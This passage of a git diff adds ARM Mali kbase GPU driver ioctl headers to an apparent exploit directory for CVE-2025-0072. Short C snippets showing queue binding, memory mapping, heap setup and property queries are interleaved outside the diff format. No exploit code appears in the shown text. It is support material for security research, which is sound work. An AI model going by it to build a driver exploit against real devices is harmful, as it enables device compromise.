&base_jit_alloc_info_10_2 + * jit_version == 2, refer to &base_jit_alloc_info_11_5 + * + * Kbase version history: + * 11.20: added @heap_info_gpu_addr + */ +struct base_jit_alloc_info { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; + __u64 heap_info_gpu_addr; +}; + +enum base_external_resource_access { + BASE_EXT_RES_ACCESS_SHARED, + BASE_EXT_RES_ACCESS_EXCLUSIVE +}; + +struct base_external_resource { + __u64 ext_resource; +}; + +/** + * BASE_EXT_RES_COUNT_MAX - The maximum number of external resources + * which can be mapped/unmapped in a single request. + */ +#define BASE_EXT_RES_COUNT_MAX 10 + +/** + * struct base_external_resource_list - Structure which describes a list of + * external resources. + * @count: The number of resources. + * @ext_res: Array of external resources which is + * sized at allocation time. 
+ */
+struct base_external_resource_list {
+	__u64 count;
+	struct base_external_resource ext_res[1];
+};
+
+#endif /* _UAPI_BASE_KERNEL_H_ */
diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mali_kbase_csf_ioctl.h b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_kbase_csf_ioctl.h
new file mode 100644
index 0000000..91249ca
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_kbase_csf_ioctl.h
@@ -0,0 +1,556 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2020-2022 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_KBASE_CSF_IOCTL_H_
+#define _UAPI_KBASE_CSF_IOCTL_H_
+
+#include <asm/ioctl.h>
+#include <linux/types.h>
+
+/*
+ * 1.0:
+ * - CSF IOCTL header separated from JM
+ * 1.1:
+ * - Add a new priority level BASE_QUEUE_GROUP_PRIORITY_REALTIME
+ * - Add ioctl 54: This controls the priority setting.
+ * 1.2:
+ * - Add new CSF GPU_FEATURES register into the property structure
+ *   returned by KBASE_IOCTL_GET_GPUPROPS
+ * 1.3:
+ * - Add __u32 group_uid member to
+ *   &struct_kbase_ioctl_cs_queue_group_create.out
+ * 1.4:
+ * - Replace padding in kbase_ioctl_cs_get_glb_iface with
+ *   instr_features member of same size
+ * 1.5:
+ * - Add ioctl 40: kbase_ioctl_cs_queue_register_ex, this is a new
+ *   queue registration call with extended format for supporting CS
+ *   trace configurations with CSF trace_command.
+ * 1.6:
+ * - Added new HW performance counters interface to all GPUs.
+ * 1.7:
+ * - Added reserved field to QUEUE_GROUP_CREATE ioctl for future use
+ * 1.8:
+ * - Removed Kernel legacy HWC interface
+ * 1.9:
+ * - Reorganization of GPU-VA memory zones, including addition of
+ *   FIXED_VA zone and auto-initialization of EXEC_VA zone.
+ * - Added new Base memory allocation interface
+ * 1.10:
+ * - First release of new HW performance counters interface.
+ * 1.11:
+ * - Dummy model (no mali) backend will now clear HWC values after each sample
+ * 1.12:
+ * - Added support for incremental rendering flag in CSG create call
+ * 1.13:
+ * - Added ioctl to query a register of USER page.
+ * 1.14: + * - Added support for passing down the buffer descriptor VA in tiler heap init + */ + +#define BASE_UK_VERSION_MAJOR 1 +#define BASE_UK_VERSION_MINOR 14 + +/** + * struct kbase_ioctl_version_check - Check version compatibility between + * kernel and userspace + * + * @major: Major version number + * @minor: Minor version number + */ +struct kbase_ioctl_version_check { + __u16 major; + __u16 minor; +}; + +#define KBASE_IOCTL_VERSION_CHECK_RESERVED \ + _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check) + +/** + * struct kbase_ioctl_cs_queue_register - Register a GPU command queue with the + * base back-end + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + * @buffer_size: Size of the buffer in bytes + * @priority: Priority of the queue within a group when run within a process + * @padding: Currently unused, must be zero + * + * Note: There is an identical sub-section in kbase_ioctl_cs_queue_register_ex. + * Any change of this struct should also be mirrored to the latter. + */ +struct kbase_ioctl_cs_queue_register { + __u64 buffer_gpu_addr; + __u32 buffer_size; + __u8 priority; + __u8 padding[3]; +}; + +#define KBASE_IOCTL_CS_QUEUE_REGISTER \ + _IOW(KBASE_IOCTL_TYPE, 36, struct kbase_ioctl_cs_queue_register) + +/** + * struct kbase_ioctl_cs_queue_kick - Kick the GPU command queue group scheduler + * to notify that a queue has been updated + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + */ +struct kbase_ioctl_cs_queue_kick { + __u64 buffer_gpu_addr; +}; + +#define KBASE_IOCTL_CS_QUEUE_KICK \ + _IOW(KBASE_IOCTL_TYPE, 37, struct kbase_ioctl_cs_queue_kick) + +/** + * union kbase_ioctl_cs_queue_bind - Bind a GPU command queue to a group + * + * @in: Input parameters + * @in.buffer_gpu_addr: GPU address of the buffer backing the queue + * @in.group_handle: Handle of the group to which the queue should be bound + * @in.csi_index: Index of the CSF interface the queue should be bound to + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.mmap_handle: Handle to be used for creating the mapping of CS + * input/output pages + */ +union kbase_ioctl_cs_queue_bind { + struct { + __u64 buffer_gpu_addr; + __u8 group_handle; + __u8 csi_index; + __u8 padding[6]; + } in; + struct { + __u64 mmap_handle; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_BIND \ + _IOWR(KBASE_IOCTL_TYPE, 39, union kbase_ioctl_cs_queue_bind) + +/** + * struct kbase_ioctl_cs_queue_register_ex - Register a GPU command queue with the + * base back-end in extended format, + * involving trace buffer configuration + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + * @buffer_size: Size of the buffer in bytes + * @priority: Priority of the queue within a group when run within a process + * @padding: Currently unused, must be zero + * @ex_offset_var_addr: GPU address of the trace buffer write offset variable + * @ex_buffer_base: Trace buffer GPU base address for the queue + * @ex_buffer_size: Size of the trace buffer in bytes + * @ex_event_size: Trace event write size, in log2 designation + * @ex_event_state: Trace event states configuration + * @ex_padding: Currently unused, must be zero + * + * Note: There is an identical sub-section at the start of this struct to that + * of @ref kbase_ioctl_cs_queue_register. Any change of this sub-section + * must also be mirrored to the latter. Following the said sub-section, + * the remaining fields form the extension, marked with ex_*.
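The `mmap_handle` returned by the bind ioctl above is a cookie rather than a real file offset: userspace passes it as the `mmap` offset on the device fd to map the queue's USER I/O pages. A minimal sketch of the register, bind, and map sequence (the same flow `mali_userio.c` uses later in this diff; `fd`, `queue_va` and `group` are caller-supplied):

```c
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <err.h>
#include "mali_kbase_csf_ioctl.h"

static void *map_queue_userio(int fd, __u64 queue_va, __u8 group)
{
    struct kbase_ioctl_cs_queue_register reg = {
        .buffer_gpu_addr = queue_va,
        .buffer_size = 0x1000,          /* one page backing the queue */
    };
    if (ioctl(fd, KBASE_IOCTL_CS_QUEUE_REGISTER, &reg) < 0)
        err(1, "queue register");

    union kbase_ioctl_cs_queue_bind bind = {
        .in = { .buffer_gpu_addr = queue_va, .group_handle = group },
    };
    if (ioctl(fd, KBASE_IOCTL_CS_QUEUE_BIND, &bind) < 0)
        err(1, "queue bind");

    /* out.mmap_handle is a cookie to use as the mmap offset; the result
     * may be MAP_FAILED and should be checked by the caller. */
    return mmap(NULL, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, fd,
                bind.out.mmap_handle);
}
```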
+ */ +struct kbase_ioctl_cs_queue_register_ex { + __u64 buffer_gpu_addr; + __u32 buffer_size; + __u8 priority; + __u8 padding[3]; + __u64 ex_offset_var_addr; + __u64 ex_buffer_base; + __u32 ex_buffer_size; + __u8 ex_event_size; + __u8 ex_event_state; + __u8 ex_padding[2]; +}; + +#define KBASE_IOCTL_CS_QUEUE_REGISTER_EX \ + _IOW(KBASE_IOCTL_TYPE, 40, struct kbase_ioctl_cs_queue_register_ex) + +/** + * struct kbase_ioctl_cs_queue_terminate - Terminate a GPU command queue + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + */ +struct kbase_ioctl_cs_queue_terminate { + __u64 buffer_gpu_addr; +}; + +#define KBASE_IOCTL_CS_QUEUE_TERMINATE \ + _IOW(KBASE_IOCTL_TYPE, 41, struct kbase_ioctl_cs_queue_terminate) + +/** + * union kbase_ioctl_cs_queue_group_create_1_6 - Create a GPU command queue + * group + * @in: Input parameters + * @in.tiler_mask: Mask of tiler endpoints the group is allowed to use. + * @in.fragment_mask: Mask of fragment endpoints the group is allowed to use. + * @in.compute_mask: Mask of compute endpoints the group is allowed to use. + * @in.cs_min: Minimum number of CSs required. + * @in.priority: Queue group's priority within a process. + * @in.tiler_max: Maximum number of tiler endpoints the group is allowed + * to use. + * @in.fragment_max: Maximum number of fragment endpoints the group is + * allowed to use. + * @in.compute_max: Maximum number of compute endpoints the group is allowed + * to use. + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.group_handle: Handle of a newly created queue group. + * @out.padding: Currently unused, must be zero + * @out.group_uid: UID of the queue group available to base. + */ +union kbase_ioctl_cs_queue_group_create_1_6 { + struct { + __u64 tiler_mask; + __u64 fragment_mask; + __u64 compute_mask; + __u8 cs_min; + __u8 priority; + __u8 tiler_max; + __u8 fragment_max; + __u8 compute_max; + __u8 padding[3]; + + } in; + struct { + __u8 group_handle; + __u8 padding[3]; + __u32 group_uid; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_CREATE_1_6 \ + _IOWR(KBASE_IOCTL_TYPE, 42, union kbase_ioctl_cs_queue_group_create_1_6) + +/** + * union kbase_ioctl_cs_queue_group_create - Create a GPU command queue group + * @in: Input parameters + * @in.tiler_mask: Mask of tiler endpoints the group is allowed to use. + * @in.fragment_mask: Mask of fragment endpoints the group is allowed to use. + * @in.compute_mask: Mask of compute endpoints the group is allowed to use. + * @in.cs_min: Minimum number of CSs required. + * @in.priority: Queue group's priority within a process. + * @in.tiler_max: Maximum number of tiler endpoints the group is allowed + * to use. + * @in.fragment_max: Maximum number of fragment endpoints the group is + * allowed to use. + * @in.compute_max: Maximum number of compute endpoints the group is allowed + * to use. + * @in.csi_handlers: Flags to signal that the application intends to use CSI + * exception handlers in some linear buffers to deal with + * the given exception types. + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.group_handle: Handle of a newly created queue group. + * @out.padding: Currently unused, must be zero + * @out.group_uid: UID of the queue group available to base. 
+ */ +union kbase_ioctl_cs_queue_group_create { + struct { + __u64 tiler_mask; + __u64 fragment_mask; + __u64 compute_mask; + __u8 cs_min; + __u8 priority; + __u8 tiler_max; + __u8 fragment_max; + __u8 compute_max; + __u8 csi_handlers; + __u8 padding[2]; + /** + * @in.reserved: Reserved + */ + __u64 reserved; + } in; + struct { + __u8 group_handle; + __u8 padding[3]; + __u32 group_uid; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_CREATE \ + _IOWR(KBASE_IOCTL_TYPE, 58, union kbase_ioctl_cs_queue_group_create) + +/** + * struct kbase_ioctl_cs_queue_group_term - Terminate a GPU command queue group + * + * @group_handle: Handle of the queue group to be terminated + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_cs_queue_group_term { + __u8 group_handle; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_TERMINATE \ + _IOW(KBASE_IOCTL_TYPE, 43, struct kbase_ioctl_cs_queue_group_term) + +#define KBASE_IOCTL_CS_EVENT_SIGNAL \ + _IO(KBASE_IOCTL_TYPE, 44) + +typedef __u8 base_kcpu_queue_id; /* We support up to 256 active KCPU queues */ + +/** + * struct kbase_ioctl_kcpu_queue_new - Create a KCPU command queue + * + * @id: ID of the new command queue returned by the kernel + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_new { + base_kcpu_queue_id id; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_CREATE \ + _IOR(KBASE_IOCTL_TYPE, 45, struct kbase_ioctl_kcpu_queue_new) + +/** + * struct kbase_ioctl_kcpu_queue_delete - Destroy a KCPU command queue + * + * @id: ID of the command queue to be destroyed + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_delete { + base_kcpu_queue_id id; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_DELETE \ + _IOW(KBASE_IOCTL_TYPE, 46, struct kbase_ioctl_kcpu_queue_delete) + +/** + * struct kbase_ioctl_kcpu_queue_enqueue - Enqueue commands into the KCPU queue + * + * @addr: Memory address of an array of struct base_kcpu_queue_command + * @nr_commands: Number of commands in the array + * @id: kcpu queue identifier, returned by KBASE_IOCTL_KCPU_QUEUE_CREATE ioctl + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_kcpu_queue_enqueue { + __u64 addr; + __u32 nr_commands; + base_kcpu_queue_id id; + __u8 padding[3]; +}; + +#define KBASE_IOCTL_KCPU_QUEUE_ENQUEUE \ + _IOW(KBASE_IOCTL_TYPE, 47, struct kbase_ioctl_kcpu_queue_enqueue) + +/** + * union kbase_ioctl_cs_tiler_heap_init - Initialize chunked tiler memory heap + * @in: Input parameters + * @in.chunk_size: Size of each chunk. + * @in.initial_chunks: Initial number of chunks that heap will be created with. + * @in.max_chunks: Maximum number of chunks that the heap is allowed to use. + * @in.target_in_flight: Number of render-passes that the driver should attempt to + * keep in flight for which allocation of new chunks is + * allowed. + * @in.group_id: Group ID to be used for physical allocations. + * @in.padding: Padding + * @in.buf_desc_va: Buffer descriptor GPU VA for tiler heap reclaims. + * @out: Output parameters + * @out.gpu_heap_va: GPU VA (virtual address) of Heap context that was set up + * for the heap. + * @out.first_chunk_va: GPU VA of the first chunk allocated for the heap, + * actually points to the header of heap chunk and not to + * the low address of free memory in the chunk. 
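The tiler heap ioctl documented above (its union is defined just below) follows the same in/out pattern. A hedged sketch, assuming an open /dev/mali0 fd and purely illustrative sizes:

```c
#include <sys/ioctl.h>
#include <err.h>
#include "mali_kbase_csf_ioctl.h"

/* Illustrative: create a chunked tiler heap and return the heap context VA,
 * which is later passed to KBASE_IOCTL_CS_TILER_HEAP_TERM. */
static __u64 tiler_heap_create(int fd)
{
    union kbase_ioctl_cs_tiler_heap_init heap = {0};
    heap.in.chunk_size = 1 << 21;     /* 2 MiB chunks (example value) */
    heap.in.initial_chunks = 1;
    heap.in.max_chunks = 4;
    heap.in.target_in_flight = 1;
    heap.in.group_id = 0;
    heap.in.buf_desc_va = 0;          /* no reclaim buffer descriptor */
    if (ioctl(fd, KBASE_IOCTL_CS_TILER_HEAP_INIT, &heap) < 0)
        err(1, "tiler heap init");
    return heap.out.gpu_heap_va;
}
```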
+ */ +union kbase_ioctl_cs_tiler_heap_init { + struct { + __u32 chunk_size; + __u32 initial_chunks; + __u32 max_chunks; + __u16 target_in_flight; + __u8 group_id; + __u8 padding; + __u64 buf_desc_va; + } in; + struct { + __u64 gpu_heap_va; + __u64 first_chunk_va; + } out; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_INIT \ + _IOWR(KBASE_IOCTL_TYPE, 48, union kbase_ioctl_cs_tiler_heap_init) + +/** + * union kbase_ioctl_cs_tiler_heap_init_1_13 - Initialize chunked tiler memory heap, + * earlier version up to 1.13 + * @in: Input parameters + * @in.chunk_size: Size of each chunk. + * @in.initial_chunks: Initial number of chunks that heap will be created with. + * @in.max_chunks: Maximum number of chunks that the heap is allowed to use. + * @in.target_in_flight: Number of render-passes that the driver should attempt to + * keep in flight for which allocation of new chunks is + * allowed. + * @in.group_id: Group ID to be used for physical allocations. + * @in.padding: Padding + * @out: Output parameters + * @out.gpu_heap_va: GPU VA (virtual address) of Heap context that was set up + * for the heap. + * @out.first_chunk_va: GPU VA of the first chunk allocated for the heap, + * actually points to the header of heap chunk and not to + * the low address of free memory in the chunk. + */ +union kbase_ioctl_cs_tiler_heap_init_1_13 { + struct { + __u32 chunk_size; + __u32 initial_chunks; + __u32 max_chunks; + __u16 target_in_flight; + __u8 group_id; + __u8 padding; + } in; + struct { + __u64 gpu_heap_va; + __u64 first_chunk_va; + } out; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_INIT_1_13 \ + _IOWR(KBASE_IOCTL_TYPE, 48, union kbase_ioctl_cs_tiler_heap_init_1_13) + +/** + * struct kbase_ioctl_cs_tiler_heap_term - Terminate a chunked tiler heap + * instance + * + * @gpu_heap_va: GPU VA of Heap context that was set up for the heap. + */ +struct kbase_ioctl_cs_tiler_heap_term { + __u64 gpu_heap_va; +}; + +#define KBASE_IOCTL_CS_TILER_HEAP_TERM \ + _IOW(KBASE_IOCTL_TYPE, 49, struct kbase_ioctl_cs_tiler_heap_term) + +/** + * union kbase_ioctl_cs_get_glb_iface - Request the global control block + * of CSF interface capabilities + * + * @in: Input parameters + * @in.max_group_num: The maximum number of groups to be read. Can be 0, in + * which case groups_ptr is unused. + * @in.max_total_stream_num: The maximum number of CSs to be read. Can be 0, in + * which case streams_ptr is unused. + * @in.groups_ptr: Pointer where to store all the group data (sequentially). + * @in.streams_ptr: Pointer where to store all the CS data (sequentially). + * @out: Output parameters + * @out.glb_version: Global interface version. + * @out.features: Bit mask of features (e.g. whether certain types of job + * can be suspended). + * @out.group_num: Number of CSGs supported. + * @out.prfcnt_size: Size of CSF performance counters, in bytes. Bits 31:16 + * hold the size of firmware performance counter data + * and 15:0 hold the size of hardware performance counter + * data. + * @out.total_stream_num: Total number of CSs, summed across all groups. + * @out.instr_features: Instrumentation features. Bits 7:4 hold the maximum + * size of events. Bits 3:0 hold the offset update rate.
+ * (csf >= 1.1.0) + * + */ +union kbase_ioctl_cs_get_glb_iface { + struct { + __u32 max_group_num; + __u32 max_total_stream_num; + __u64 groups_ptr; + __u64 streams_ptr; + } in; + struct { + __u32 glb_version; + __u32 features; + __u32 group_num; + __u32 prfcnt_size; + __u32 total_stream_num; + __u32 instr_features; + } out; +}; + +#define KBASE_IOCTL_CS_GET_GLB_IFACE \ + _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_ioctl_cs_get_glb_iface) + +struct kbase_ioctl_cs_cpu_queue_info { + __u64 buffer; + __u64 size; +}; + +#define KBASE_IOCTL_VERSION_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check) + +#define KBASE_IOCTL_CS_CPU_QUEUE_DUMP \ + _IOW(KBASE_IOCTL_TYPE, 53, struct kbase_ioctl_cs_cpu_queue_info) + +/** + * union kbase_ioctl_mem_alloc_ex - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @in.fixed_address: The GPU virtual address requested for the allocation, + * if the allocation is using the BASE_MEM_FIXED flag. + * @in.extra: Space for extra parameters that may be added in the future. + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc_ex { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + __u64 fixed_address; + __u64 extra[3]; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC_EX _IOWR(KBASE_IOCTL_TYPE, 59, union kbase_ioctl_mem_alloc_ex) + +/** + * union kbase_ioctl_read_user_page - Read a register of USER page + * + * @in: Input parameters. + * @in.offset: Register offset in USER page. + * @in.padding: Padding to round up to a multiple of 8 bytes, must be zero. + * @out: Output parameters. + * @out.val_lo: Value of 32bit register or the 1st half of 64bit register to be read. + * @out.val_hi: Value of the 2nd half of 64bit register to be read. + */ +union kbase_ioctl_read_user_page { + struct { + __u32 offset; + __u32 padding; + } in; + struct { + __u32 val_lo; + __u32 val_hi; + } out; +}; + +#define KBASE_IOCTL_READ_USER_PAGE _IOWR(KBASE_IOCTL_TYPE, 60, union kbase_ioctl_read_user_page) + +#endif /* _UAPI_KBASE_CSF_IOCTL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mali_kbase_ioctl.h b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_kbase_ioctl.h new file mode 100644 index 0000000..9eaa83c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_kbase_ioctl.h @@ -0,0 +1,894 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2017-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. 
+ * + */ + +#ifndef _UAPI_KBASE_IOCTL_H_ +#define _UAPI_KBASE_IOCTL_H_ + +#ifdef __cplusplus +extern "C" { +#endif + +#include <asm/ioctl.h> +#include <linux/types.h> + +#include "mali_kbase_csf_ioctl.h" + +#define KBASE_IOCTL_TYPE 0x80 + +/** + * struct kbase_ioctl_set_flags - Set kernel context creation flags + * + * @create_flags: Flags - see base_context_create_flags + */ +struct kbase_ioctl_set_flags { + __u32 create_flags; +}; + +#define KBASE_IOCTL_SET_FLAGS \ + _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags) + +/** + * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel + * + * @buffer: Pointer to the buffer to store properties into + * @size: Size of the buffer + * @flags: Flags - must be zero for now + * + * The ioctl will return the number of bytes stored into @buffer or an error + * on failure (e.g. @size is too small). If @size is specified as 0 then no + * data will be written but the return value will be the number of bytes needed + * for all the properties. + * + * @flags may be used in the future to request a different format for the + * buffer. With @flags == 0 the following format is used. + * + * The buffer will be filled with pairs of values, a __u32 key identifying the + * property followed by the value. The size of the value is identified using + * the bottom bits of the key. The value then immediately follows the key and + * is tightly packed (there is no padding). All keys and values are + * little-endian. + * + * 00 = __u8 + * 01 = __u16 + * 10 = __u32 + * 11 = __u64 + */ +struct kbase_ioctl_get_gpuprops { + __u64 buffer; + __u32 size; + __u32 flags; +}; + +#define KBASE_IOCTL_GET_GPUPROPS \ + _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops) + +/** + * union kbase_ioctl_mem_alloc - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC \ + _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc) + +/** + * union kbase_ioctl_mem_query - Query properties of a GPU memory region + * @in: Input parameters + * @in.gpu_addr: A GPU address contained within the region + * @in.query: The type of query + * @out: Output parameters + * @out.value: The result of the query + * + * Use a %KBASE_MEM_QUERY_xxx flag as input for @query.
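A sketch of consuming the KBASE_IOCTL_GET_GPUPROPS format described above: a first call with a zeroed struct to learn the required size, then a parse of the packed key/value pairs. The property-ID layout (ID in the upper bits, size code in bits 1:0) is an assumption consistent with the size-code table above:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <err.h>
#include "mali_kbase_ioctl.h"

static void dump_gpuprops(int fd)
{
    struct kbase_ioctl_get_gpuprops get = {0};
    int size = ioctl(fd, KBASE_IOCTL_GET_GPUPROPS, &get); /* size == 0: query needed bytes */
    if (size < 0)
        err(1, "gpuprops size query");

    __u8 *buf = malloc(size);
    get.buffer = (__u64)(uintptr_t)buf;
    get.size = (__u32)size;
    if (ioctl(fd, KBASE_IOCTL_GET_GPUPROPS, &get) < 0)
        err(1, "gpuprops read");

    for (__u8 *p = buf; p + sizeof(__u32) <= buf + size;) {
        __u32 key;
        memcpy(&key, p, sizeof(key));
        p += sizeof(key);
        int nbytes = 1 << (key & 0x3);   /* 00=__u8, 01=__u16, 10=__u32, 11=__u64 */
        __u64 value = 0;
        memcpy(&value, p, nbytes);       /* values are tightly packed, little-endian */
        p += nbytes;
        printf("prop %u = 0x%llx\n", key >> 2, (unsigned long long)value);
    }
    free(buf);
}
```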
+ */ +union kbase_ioctl_mem_query { + struct { + __u64 gpu_addr; + __u64 query; + } in; + struct { + __u64 value; + } out; +}; + +#define KBASE_IOCTL_MEM_QUERY \ + _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query) + +#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1) +#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2) +#define KBASE_MEM_QUERY_FLAGS ((__u64)3) + +/** + * struct kbase_ioctl_mem_free - Free a memory region + * @gpu_addr: Handle to the region to free + */ +struct kbase_ioctl_mem_free { + __u64 gpu_addr; +}; + +#define KBASE_IOCTL_MEM_FREE \ + _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free) + +/** + * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader + * @buffer_count: requested number of dumping buffers + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + * + * A fd is returned from the ioctl if successful, or a negative value on error + */ +struct kbase_ioctl_hwcnt_reader_setup { + __u32 buffer_count; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_READER_SETUP \ + _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup) + +/** + * struct kbase_ioctl_hwcnt_values - Values to set the dummy counters to. + * @data: Counter samples for the dummy model. + * @size: Size of the counter sample data. + * @padding: Padding. + */ +struct kbase_ioctl_hwcnt_values { + __u64 data; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_HWCNT_SET \ + _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values) + +/** + * struct kbase_ioctl_disjoint_query - Query the disjoint counter + * @counter: A counter of disjoint events in the kernel + */ +struct kbase_ioctl_disjoint_query { + __u32 counter; +}; + +#define KBASE_IOCTL_DISJOINT_QUERY \ + _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query) + +/** + * struct kbase_ioctl_get_ddk_version - Query the kernel version + * @version_buffer: Buffer to receive the kernel version string + * @size: Size of the buffer + * @padding: Padding + * + * The ioctl will return the number of bytes written into version_buffer + * (which includes a NULL byte) or a negative error code + * + * The ioctl request code has to be _IOW because the data in ioctl struct is + * being copied to the kernel, even though the kernel then writes out the + * version info to the buffer specified in the ioctl. + */ +struct kbase_ioctl_get_ddk_version { + __u64 version_buffer; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_GET_DDK_VERSION \ + _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version) + +/** + * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 10.2--11.4) + * @va_pages: Number of VA pages to reserve for JIT + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility.
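For example, the current backing of a region can be read back with the MEM_QUERY flags defined above. A minimal sketch; `gpu_va` is any GPU address inside the region, and the helper name is hypothetical:

```c
#include <sys/ioctl.h>
#include <err.h>
#include "mali_kbase_ioctl.h"

/* Returns the value reported for KBASE_MEM_QUERY_COMMIT_SIZE
 * (the number of pages currently backing the region). */
static __u64 query_commit_size(int fd, __u64 gpu_va)
{
    union kbase_ioctl_mem_query q = {0};
    q.in.gpu_addr = gpu_va;
    q.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
    if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, &q) < 0)
        err(1, "mem query");
    return q.out.value;
}
```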
